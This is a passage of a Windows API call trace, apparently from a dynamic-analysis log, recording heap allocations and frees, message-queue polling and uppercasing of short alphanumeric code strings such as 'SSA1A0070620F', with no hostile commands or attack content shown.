Flags=0x0, Size=0x4) returned 0x2a71a68 [0153.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0153.024] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0153.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0153.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0153.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0153.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0153.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0153.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0153.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0153.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0153.024] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0153.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0153.024] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0153.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0153.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0153.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0153.024] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0153.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0153.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0153.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaae0 [0153.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74430 [0153.024] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0153.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0153.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0153.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0153.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0153.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0153.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0153.024] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0153.024] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0153.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0153.025] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0153.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0153.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0153.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0153.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0153.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0153.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0153.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0153.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0153.025] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0153.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0153.025] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0153.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0153.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0153.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0153.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0153.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0153.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0153.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0153.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0153.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0153.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0153.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0153.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0153.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74430 | out: hHeap=0x2af0000) returned 1 [0153.025] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0153.025] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0153.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7100 [0153.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0153.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0153.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0153.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0153.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0153.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0153.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0153.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0153.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7100 | out: hHeap=0x2af0000) returned 1 [0153.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0153.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0153.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0153.026] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0153.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0153.026] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0153.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0153.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0153.026] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0153.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0153.026] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0153.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaaac8 [0153.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74238 [0153.026] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0153.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0153.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0153.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0153.026] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0153.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0153.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0153.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0153.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0153.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0153.027] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0153.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0153.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0153.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0153.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0153.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0153.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0153.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0153.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0153.027] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0153.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0153.027] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0153.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0153.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0153.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0153.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0153.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0153.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0153.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0153.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0153.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0153.027] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0153.027] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0153.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0153.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0153.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0153.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0153.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0153.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0153.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0153.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa858 | out: hHeap=0x2af0000) returned 1 [0153.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0153.028] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0153.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74238 | out: hHeap=0x2af0000) returned 1 [0153.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0153.028] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0153.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0153.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0153.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0153.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0153.028] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0153.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5edc0 [0153.028] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0153.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0153.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0153.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7220 [0153.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7220 | out: hHeap=0x2af0000) returned 1 [0153.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0153.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0153.028] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e980 [0153.028] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0153.028] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e980 | out: hHeap=0x2af0000) returned 1 [0153.028] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0153.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0153.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0153.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0153.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719f8 [0153.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78110 [0153.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719b8 [0153.029] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0153.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0153.029] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0153.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa978 [0153.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0153.029] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0153.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0153.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0153.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0153.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0153.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0153.029] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0153.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0153.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a78 [0153.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0153.030] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0153.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78098 | out: hHeap=0x2af0000) returned 1 [0153.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a78 | out: hHeap=0x2af0000) returned 1 [0153.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0153.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0153.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0153.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0153.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0153.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e8c0 [0153.030] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0153.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e8c0 | out: hHeap=0x2af0000) returned 1 [0153.030] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0153.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b98 [0153.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0153.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0153.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0153.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0153.030] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0153.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0153.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0153.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab28 | out: hHeap=0x2af0000) returned 1 [0153.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0153.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0153.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0153.030] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0153.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa978 | out: hHeap=0x2af0000) returned 1 [0153.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0153.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0153.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0153.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaab28 [0153.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0153.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0153.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0153.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0153.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0153.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0153.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0153.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0153.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0153.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0153.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0153.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0153.031] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0153.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719c8 | out: hHeap=0x2af0000) returned 1 [0153.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0153.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0153.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabd0 | out: hHeap=0x2af0000) returned 1 [0153.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaadf8 | out: hHeap=0x2af0000) returned 1 [0153.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaab40 | out: hHeap=0x2af0000) returned 1 [0153.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0153.031] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0153.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0153.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0153.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0153.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b58 | out: hHeap=0x2af0000) returned 1 [0153.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaabb8 | out: hHeap=0x2af0000) returned 1 [0153.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaad98 | out: hHeap=0x2af0000) returned 1 [0153.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae28 | out: hHeap=0x2af0000) returned 1 [0153.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a68 | out: hHeap=0x2af0000) returned 1 [0153.032] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, 